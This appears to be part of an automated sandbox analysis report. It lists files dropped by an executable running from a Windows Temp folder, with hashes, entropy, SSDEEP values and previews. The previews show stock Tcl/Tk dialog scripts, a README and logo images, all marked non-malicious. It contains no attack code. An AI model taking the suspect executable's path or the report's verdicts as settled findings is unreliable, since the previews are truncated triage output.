                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):9644
                                                                                                                                                                                                                                                    Entropy (8bit):4.7532230880971715
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:MvjK3vpIKU7JBhpZofNAieYemp8U3wNV97oZAWpopePXUstccjocIv6tq9jJKT4L:M4viKeBQ+3M3wNwfwsFiSIv6wO7R33nC
                                                                                                                                                                                                                                                    MD5:39531504664D07DB43D884F5D1BCA6A9
                                                                                                                                                                                                                                                    SHA1:1B511035F111CACF45D5D23704345ABC7FFDF5C1
                                                                                                                                                                                                                                                    SHA-256:A0F86258294A5D7D7A9475F3A397F5DABA4CF7D748A57C66EA456B4E8C6CA2E1
                                                                                                                                                                                                                                                    SHA-512:BD50BA9E76D4CDEC1FCCED9EF3EED46767A8FE9DDFCAADD85858584FAB883AAB1B140BC7EF4E88E8690DD66E8209FFC165B27B4125F2CFE77DE54B27C3454123
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# choosedir.tcl --.#.#.Choose directory dialog implementation for Unix/Mac..#.# Copyright (c) 1998-2000 by Scriptics Corporation..# All rights reserved...# Make sure the tk::dialog namespace, in which all dialogs should live, exists.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::file {}..# Make the chooseDir namespace inside the dialog namespace.namespace eval ::tk::dialog::file::chooseDir {. namespace import -force ::tk::msgcat::*.}..# ::tk::dialog::file::chooseDir:: --.#.#.Implements the TK directory selection dialog..#.# Arguments:.#.args..Options parsed by the procedure..#.proc ::tk::dialog::file::chooseDir:: {args} {. variable ::tk::Priv. set dataName __tk_choosedir. upvar ::tk::dialog::file::$dataName data. Config $dataName $args.. if {$data(-parent) eq "."} {. set w .$dataName. } else {. set w $data(-parent).$dataName. }.. # (re)create the dialog box if necessary. #. if {![winfo exists $w]} {..::tk::dialog::file::Create
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):21301
                                                                                                                                                                                                                                                    Entropy (8bit):4.982898618853273
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:HjJsgeqJelEc661T26UYdBVDyPHxQlefbGIjVjrdOqAQBxhKN2zD5yT9RmqEdFC6:DagJJlRfxQEHN
                                                                                                                                                                                                                                                    MD5:6E658C822220893266EAE22DC14DFF01
                                                                                                                                                                                                                                                    SHA1:AFF84F123E886DF2FCFBE69488AC733E26697F8F
                                                                                                                                                                                                                                                    SHA-256:1C4AB4BBBD9C37B6F4696917030AD13BBB14CD4502FF81AD211157D8BCE6C29A
                                                                                                                                                                                                                                                    SHA-512:DE7A7BC99644B8AD5FB89F4FBEAE648951AA6EDB213CA8D2CFFA8D6EADA2D194C6996DA120536B915020D2A5E4921E08E7D05A478A18DB1A0283ECAC26D56954
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# clrpick.tcl --.#.#.Color selection dialog for platforms that do not support a.#.standard color selection dialog..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#.# ToDo:.#.#.(1): Find out how many free colors are left in the colormap and.#. don't allocate too many colors..#.(2): Implement HSV color selection. .#..# Make sure namespaces exist.namespace eval ::tk {}.namespace eval ::tk::dialog {}.namespace eval ::tk::dialog::color {. namespace import ::tk::msgcat::*.}..# ::tk::dialog::color:: --.#.#.Create a color dialog and let the user choose a color. This function.#.should not be called directly. It is called by the tk_chooseColor.#.function when a native color selector widget does not exist.#.proc ::tk::dialog::color:: {args} {. variable ::tk::Priv. set dataName __tk__color. upvar ::tk::dialog::color::$dataName data. set w .$dataName
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):7726
                                                                                                                                                                                                                                                    Entropy (8bit):5.004404304157801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:Aq7APy5HEO9KY8QHyWpLWNRYG50aGAZbQWlO+W0WvHv/3WvWHLV7LKpTTk:Aq7A6HJ9K+yWpaNRYuVDST1rvveuHZLT
                                                                                                                                                                                                                                                    MD5:2E0793510BA032CBE424A716CF00A8F0
                                                                                                                                                                                                                                                    SHA1:DCE9925FF6FCA2CB34D9FAC0280E97924DE885A7
                                                                                                                                                                                                                                                    SHA-256:2591BBD2BC87D8F551A12D5F7F3F3EF21F070244E5EBA62E09DB003787F91790
                                                                                                                                                                                                                                                    SHA-512:4D81B1E9569650C85978045AD5AAC78EF37A986F1DC21A5A10E7544B1D2269184A5571D8F6C0CA9D61CA2C78B94BA7100B3ACC46F89520A1829A87533B29FA03
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# comdlg.tcl --.#.#.Some functions needed for the common dialog boxes. Probably need to go.#.in a different file..#.# Copyright (c) 1996 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# tclParseConfigSpec --.#.#.Parses a list of "-option value" pairs. If all options and.#.values are legal, the values are stored in.#.$data($option). Otherwise an error message is returned. When.#.an error happens, the data() array may have been partially.#.modified, but all the modified members of the data(0 array are.#.guaranteed to have valid values. This is different than.#.Tk_ConfigureWidget() which does not modify the value of a.#.widget record if any error occurs..#.# Arguments:.#.# w = widget record to modify. Must be the pathname of a widget..#.# specs = {.# {-commandlineswitch resourceName ResourceClass defaultValue verifier}.# {....}.# }.#.# flags = currently unused..#.# argList
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):29634
                                                                                                                                                                                                                                                    Entropy (8bit):4.917740343704056
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:eWptONWz4xOtyU/W1ZQWiVEwYGl7nS5r+KtuQlLW4qvRHTrStCO2FfB2vW3cwcZL:eWp0NWz4niTeG6r+K4YE6GMWFOYoV
                                                                                                                                                                                                                                                    MD5:3F162B54E4981151C12FE7ABC899D754
                                                                                                                                                                                                                                                    SHA1:C668D83FB92246714B9296303B14772BE4406C24
                                                                                                                                                                                                                                                    SHA-256:0C4F8AFDF412C3A23BE4C87BC597A32E98995E4957841021FBA34D0938B49F60
                                                                                                                                                                                                                                                    SHA-512:84FB3295EF2907A26E968553F8B65F4FE38E9C11D0A303CFF3F7477E474E397FA6319013ED7174D0057D5D4C8127D5A73BFFD56D32D085F258A7689795AC4396
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# console.tcl --.#.# This code constructs the console window for an application. It.# can be used by non-unix systems that do not have built-in support.# for shells..#.# Copyright (c) 1995-1997 Sun Microsystems, Inc..# Copyright (c) 1998-2000 Ajuba Solutions..# Copyright (c) 2007 Daniel A. Steffen <das@users.sourceforge.net>.#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# TODO: history - remember partially written command..namespace eval ::tk::console {. variable blinkTime 500 ; # msecs to blink braced range for. variable blinkRange 1 ; # enable blinking of the entire braced range. variable magicKeys 1 ; # enable brace matching and proc/var recognition. variable maxLines 600 ; # maximum # of lines buffered in console. variable showMatches 1 ; # show multiple expand matches.. variable inPlugin [info exists embed_args]. variable defaultPrompt ; # default prompt
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):6006
                                                                                                                                                                                                                                                    Entropy (8bit):4.773863015400918
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:WfPaDCAV8OgciKHKKcmQH+DmlYm4Kalo9mBy//IWxIb:WfPwCAVviKHKK4H+DmT4Kalo4ynDOb
                                                                                                                                                                                                                                                    MD5:02E1EA6A212E59B5B2C0B19527997D25
                                                                                                                                                                                                                                                    SHA1:1FEE1494D003542D114A5C7AE01A3DDEBDF3D871
                                                                                                                                                                                                                                                    SHA-256:8B15235D85AC90ED02EC86C48EA674C94FBB1A84E126867A5A6945A1F694743F
                                                                                                                                                                                                                                                    SHA-512:3589303BFB0C3306473770F54425111BE22EC0E66F618E7598A6082810469A3ADA44F6D44CA3A7E1760EC67277349AF6EF98A7D2949E839D910519F225DFF41B
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# dialog.tcl --.#.# This file defines the procedure tk_dialog, which creates a dialog.# box containing a bitmap, a message, and one or more buttons..#.# Copyright (c) 1992-1993 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#.# ::tk_dialog:.#.# This procedure displays a dialog box, waits for a button in the dialog.# to be invoked, then returns the index of the selected button. If the.# dialog somehow gets destroyed, -1 is returned..#.# Arguments:.# w -..Window to use for dialog top-level..# title -.Title to display in dialog's decorative frame..# text -.Message to display in dialog..# bitmap -.Bitmap to display in dialog (empty string means none)..# default -.Index of button that is to display the default ring.#..(-1 means none)..# args -.One or more strings to display in buttons across the.#..bottom of t
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):17147
                                                                                                                                                                                                                                                    Entropy (8bit):4.928989585252014
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:384:PleFkH2fRdOnOeQod3tCAERebMIDlXVQgXwVviw:P8FDqUy8V
                                                                                                                                                                                                                                                    MD5:570E6828DE3D920F3D28929A80AE709A
                                                                                                                                                                                                                                                    SHA1:9454DC6EC8262704FE46714C341A7A5A7C1032D5
                                                                                                                                                                                                                                                    SHA-256:10C9CB07C75F0E9FCC88576672A275BD35D91CC157CDF6C1FEF54998C32722C3
                                                                                                                                                                                                                                                    SHA-512:F9E2AE818056027A5DA2483CB26B26E0A7A48F2141DD84442570333EF12DCD773B79B7596111FA17A3B0B46ADC89B7D4481D38F5478DBCF82D13DA4BA77BD0A9
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# entry.tcl --.#.# This file defines the default bindings for Tk entry widgets and provides.# procedures that help in implementing those bindings..#.# Copyright (c) 1992-1994 The Regents of the University of California..# Copyright (c) 1994-1997 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..#-------------------------------------------------------------------------.# Elements of tk::Priv that are used in this file:.#.# afterId -..If non-null, it means that auto-scanning is underway.#...and it gives the "after" id for the next auto-scan.#...command to be executed..# mouseMoved -..Non-zero means the mouse has moved a significant.#...amount since the button went down (so, for example,.#...start dragging out a selection)..# pressX -..X-coordinate at which the mouse button was pressed..# selectMode -..The style of selection currently underway:.#...char, word, or line..# x, y -..La
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):4857
                                                                                                                                                                                                                                                    Entropy (8bit):4.7675047842795895
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:mumhRUI7F2WyHm6BUyNhEf6jUHKRUI7F2WyQe6L763AcnK0/61sk2ko5AgEplauw:ERUQFU52CNRUQFpLOQIG1sk2TCLplauw
                                                                                                                                                                                                                                                    MD5:7EA007F00BF194722FF144BE274C2176
                                                                                                                                                                                                                                                    SHA1:6835A515E85A9E55D5A27073DAE1F1A5D7424513
                                                                                                                                                                                                                                                    SHA-256:40D4E101A64B75361F763479B01207AE71535337E79CE6E162265842F6471EED
                                                                                                                                                                                                                                                    SHA-512:E2520EB065296C431C71DBBD5503709CF61F93E74FE324F4F8F3FE13131D62435B1E124D38E2EC84939B92198A54B8A71DFC0A8D32F0DD94139C54068FBCAAF2
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# focus.tcl --.#.# This file defines several procedures for managing the input.# focus..#.# Copyright (c) 1994-1995 Sun Microsystems, Inc..#.# See the file "license.terms" for information on usage and redistribution.# of this file, and for a DISCLAIMER OF ALL WARRANTIES..#..# ::tk_focusNext --.# This procedure returns the name of the next window after "w" in.# "focus order" (the window that should receive the focus next if.# Tab is typed in w). "Next" is defined by a pre-order search.# of a top-level and its non-top-level descendants, with the stacking.# order determining the order of siblings. The "-takefocus" options.# on windows determine whether or not they should be skipped..#.# Arguments:.# w -..Name of a window...proc ::tk_focusNext w {. set cur $w. while {1} {...# Descend to just before the first child of the current widget....set parent $cur..set children [winfo children $cur]..set i -1...# Look for the next sibling that isn't a top-level....while {1} {.. incr i..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):322
                                                                                                                                                                                                                                                    Entropy (8bit):4.341180398587801
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:nVhmHdeA1xNZgkrIf3Ju4dFi6VbGWrWhr3W7FxmVFraGVAJFKyVQR7icrtpwB:nPqf1fZgZA4FJbB6dm7FUjAJVVMM
                                                                                                                                                                                                                                                    MD5:FC8A86E10C264D42D28E23D9C75E7EE5
                                                                                                                                                                                                                                                    SHA1:F1BA322448D206623F8FE734192F383D8F7FA198
                                                                                                                                                                                                                                                    SHA-256:2695ADFF8E900C31B4D86414D22B8A49D6DD865CA3DD99678FA355CDC46093A8
                                                                                                                                                                                                                                                    SHA-512:29C2DF0D516B5FC8E52CB61CFCD07AF9C90B40436DFE64CEFDB2813C0827CE65BA50E0828141256E2876D4DC251E934A6854A8E0B02CDAF466D0389BD778AEF0
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:README - images directory..This directory includes images for the Tcl Logo and the Tcl Powered.Logo. Please feel free to use the Tcl Powered Logo on any of your.products that employ the use of Tcl or Tk. The Tcl logo may also be.used to promote Tcl in your product documentation, web site or other.places you so desire..
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):32900
                                                                                                                                                                                                                                                    Entropy (8bit):5.235207715374815
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:gGTVOEcRWsdEmhp6k/GLrPMlK3pJr/IbYDGDMtBF2Fz6fsFA/fSvqHWukLI2d0Nr:gGTVOEcRWsdEvLrPJ5Jr/IbYDGDMtBFh
                                                                                                                                                                                                                                                    MD5:45175418859AF67FE417BD0A053DB6E5
                                                                                                                                                                                                                                                    SHA1:2B499B7C4EBC8554ECC07B8408632CAF407FB6D5
                                                                                                                                                                                                                                                    SHA-256:F3E77FD94198EC4783109355536638E9162F9C579475383074D024037D1797D3
                                                                                                                                                                                                                                                    SHA-512:114A59FD6B99FFD628BA56B8E14FB3B59A0AB6E752E18DEA038F85DBC072BF98492CE9369D180C169EDE9ED2BD521D8C0D607C5E4988F2C83302FC413C6D6A4C
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL/TK LOGO.ILLUS).%%CreationDate: (8/1/96) (4:58 PM).%%BoundingBox: 251 331 371 512.%%HiResBoundingBox: 251.3386 331.5616 370.5213 511.775.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%DocumentCustomColors: (TCL RED).%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 90 576 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Level 2 Emul
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 68 x 100
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2341
                                                                                                                                                                                                                                                    Entropy (8bit):6.9734417899888665
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:qF/mIXn3l7+ejbL/4nZEsKPKer1OPQqVRqJbPpRRKOv/UVO47f:81nHL4T0KorxvRKkc847f
                                                                                                                                                                                                                                                    MD5:FF04B357B7AB0A8B573C10C6DA945D6A
                                                                                                                                                                                                                                                    SHA1:BCB73D8AF2628463A1B955581999C77F09F805B8
                                                                                                                                                                                                                                                    SHA-256:72F6B34D3C8F424FF0A290A793FCFBF34FD5630A916CD02E0A5DDA0144B5957F
                                                                                                                                                                                                                                                    SHA-512:10DFE631C5FC24CF239D817EEFA14329946E26ED6BCFC1B517E2F9AF81807977428BA2539AAA653A89A372257D494E8136FD6ABBC4F727E6B199400DE05ACCD5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 43 x 64
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1670
                                                                                                                                                                                                                                                    Entropy (8bit):6.326462043862671
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:PF/mIXn3l7+ejbL/4xsgq4sNC6JYp6s/pmp76F:/1nHL404raM/op2
                                                                                                                                                                                                                                                    MD5:B226CC3DA70AAB2EBB8DFFD0C953933D
                                                                                                                                                                                                                                                    SHA1:EA52219A37A140FD98AEA66EA54685DD8158D9B1
                                                                                                                                                                                                                                                    SHA-256:138C240382304F350383B02ED56C69103A9431C0544EB1EC5DCD7DEC7A555DD9
                                                                                                                                                                                                                                                    SHA-512:3D043F41B887D54CCADBF9E40E48D7FFF99B02B6FAF6B1DD0C6C6FEF0F8A17630252D371DE3C60D3EFBA80A974A0670AF3747E634C59BDFBC78544D878D498D4
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 354 x 520
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):11000
                                                                                                                                                                                                                                                    Entropy (8bit):7.88559092427108
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:192:d+nY6zludc/We/yXy9JHBUoIMSapQdrGlapzmyNMK1vbXkgMmgFW/KxIq3NhZe:YnY6p4c/OCHyowaGUaCcMK1vbXNwFW/l
                                                                                                                                                                                                                                                    MD5:45D9B00C4CF82CC53723B00D876B5E7E
                                                                                                                                                                                                                                                    SHA1:DDD10E798AF209EFCE022E97448E5EE11CEB5621
                                                                                                                                                                                                                                                    SHA-256:0F404764D07A6AE2EF9E1E0E8EAAC278B7D488D61CF1C084146F2F33B485F2ED
                                                                                                                                                                                                                                                    SHA-512:6E89DACF2077E1307DA05C16EF8FDE26E92566086346085BE10A7FD88658B9CDC87A3EC4D17504AF57D5967861B1652FA476B2DDD4D9C6BCFED9C60BB2B03B6F
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 87a, 120 x 181
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3889
                                                                                                                                                                                                                                                    Entropy (8bit):7.425138719078912
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:9qqbIh+cE4C8ric/jxK5mxsFBu3/0GIJ6Qap1Y5uMiR8pw5rB/SgijDb+TOh:hy+mnZ7xK5IsTwDQmkdiiG5rB/BE+6h
                                                                                                                                                                                                                                                    MD5:BD12B645A9B0036A9C24298CD7A81E5A
                                                                                                                                                                                                                                                    SHA1:13488E4F28676F1E0CE383F80D13510F07198B99
                                                                                                                                                                                                                                                    SHA-256:4D0BD3228AB4CC3E5159F4337BE969EC7B7334E265C99B7633E3DAF3C3FCFB62
                                                                                                                                                                                                                                                    SHA-512:F62C996857CA6AD28C9C938E0F12106E0DF5A20D1B4B0B0D17F6294A112359BA82268961F2A054BD040B5FE4057F712206D02F2E668675BBCF6DA59A4DA0A1BB
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:PostScript document text conforming DSC level 3.0, type EPS
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):27809
                                                                                                                                                                                                                                                    Entropy (8bit):5.331778921404698
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:768:geQTVOEcRWsdEmhp6k/GLrPMlK3pJrNIbYDGDMtBgu2Fz6lR5G/r+FWaGK:gnTVOEcRWsdEvLrPJ5JrNIbYDGDMtB9L
                                                                                                                                                                                                                                                    MD5:BA1051DBED2B8676CAA24593B88C91B2
                                                                                                                                                                                                                                                    SHA1:8A58FC19B20BFDC8913515D9B32CCBF8ACF92344
                                                                                                                                                                                                                                                    SHA-256:2944EBC4AF1894951BF9F1250F4E6EDF811C2183745950EA9A8A926715882CF7
                                                                                                                                                                                                                                                    SHA-512:4260CEBA7DA9463F32B0C76A2AC19D2B20C8FE48CFBA3DC7AF748AAE15FA25DCBDA085072DF7EFC8F4B4F304C7ED166FE9F93DC903E32FA1874E82D59E544DEF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:%!PS-Adobe-3.0 EPSF-3.0.%%Creator: Adobe Illustrator(TM) 5.5.%%For: (Bud Northern) (Mark Anderson Design).%%Title: (TCL PWRD LOGO.ILLUS).%%CreationDate: (8/1/96) (4:59 PM).%%BoundingBox: 242 302 377 513.%%HiResBoundingBox: 242.0523 302.5199 376.3322 512.5323.%%DocumentProcessColors: Cyan Magenta Yellow.%%DocumentSuppliedResources: procset Adobe_level2_AI5 1.0 0.%%+ procset Adobe_IllustratorA_AI5 1.0 0.%AI5_FileFormat 1.2.%AI3_ColorUsage: Color.%%CMYKCustomColor: 0 0.45 1 0 (Orange).%%+ 0 0.25 1 0 (Orange Yellow).%%+ 0 0.79 0.91 0 (PANTONE Warm Red CV).%%+ 0 0.79 0.91 0 (TCL RED).%AI3_TemplateBox: 306 396 306 396.%AI3_TileBox: 12 12 600 780.%AI3_DocumentPreview: Macintosh_ColorPic.%AI5_ArtSize: 612 792.%AI5_RulerUnits: 0.%AI5_ArtFlags: 1 0 0 1 0 0 1 1 0.%AI5_TargetResolution: 800.%AI5_NumLayers: 1.%AI5_OpenToView: 102 564 2 938 673 18 1 1 2 40.%AI5_OpenViewLayers: 7.%%EndComments.%%BeginProlog.%%BeginResource: procset Adobe_level2_AI5 1.0 0.%%Title: (Adobe Illustrator (R) Version 5.0 Le
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 64 x 100
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1615
                                                                                                                                                                                                                                                    Entropy (8bit):7.461273815456419
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:aE45BzojC3r1WAQ+HT2gAdKhPFZ/ObchgB8:V5Gb1WN+yfcObmgW
                                                                                                                                                                                                                                                    MD5:DBFAE61191B9FADD4041F4637963D84F
                                                                                                                                                                                                                                                    SHA1:BD971E71AE805C2C2E51DD544D006E92363B6C0C
                                                                                                                                                                                                                                                    SHA-256:BCC0E6458249433E8CBA6C58122B7C0EFA9557CBC8FB5F9392EED5D2579FC70B
                                                                                                                                                                                                                                                    SHA-512:ACEAD81CC1102284ED7D9187398304F21B8287019EB98B0C4EC7398DD8B5BA8E7D19CAA891AA9E7C22017B73D734110096C8A7B41A070191223B5543C39E87AF
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 97 x 150
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2489
                                                                                                                                                                                                                                                    Entropy (8bit):7.708754027741608
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:/Ev7JJ+3uvz/Hwbcp7igaIwjBui7qFxIIOdJXcI+Ks:M9oWz/7pZAV7qPIImJXtXs
                                                                                                                                                                                                                                                    MD5:711F4E22670FC5798E4F84250C0D0EAA
                                                                                                                                                                                                                                                    SHA1:1A1582650E218B0BE6FFDEFFD64D27F4B9A9870F
                                                                                                                                                                                                                                                    SHA-256:5FC25C30AEE76477F1C4E922931CC806823DF059525583FF5705705D9E913C1C
                                                                                                                                                                                                                                                    SHA-512:220C36010208A87D0F674DA06D6F5B4D6101D196544ABCB4EE32378C46C781589DB1CE7C7DFE6471A8D8E388EE6A279DB237B18AF1EB9130FF9D0222578F1589
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 113 x 175
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2981
                                                                                                                                                                                                                                                    Entropy (8bit):7.758793907956808
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:48:AmEwM8ioQoHJQBTThKVI7G78NLL120GFBBFXJRxlu+BmO/5lNqm7Eq:B57QoHJQt4II8BZ+jxluZO/5lNqm7Eq
                                                                                                                                                                                                                                                    MD5:DA5FB10F4215E9A1F4B162257972F9F3
                                                                                                                                                                                                                                                    SHA1:8DB7FB453B79B8F2B4E67AC30A4BA5B5BDDEBD3B
                                                                                                                                                                                                                                                    SHA-256:62866E95501C436B329A15432355743C6EFD64A37CFB65BCECE465AB63ECF240
                                                                                                                                                                                                                                                    SHA-512:990CF306F04A536E4F92257A07DA2D120877C00573BD0F7B17466D74E797D827F6C127E2BEAADB734A529254595918C3A5F54FDBD859BC325A162C8CD8F6F5BE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:GIF image data, version 89a, 130 x 200
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):3491
                                                                                                                                                                                                                                                    Entropy (8bit):7.790611381196208
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:96:ROGuxkQ9mcV7RXcECEtqCa+6GK8WseNXhewFIp9ZmL4u:ROGwpVOEbqCrWsUhtIk4u
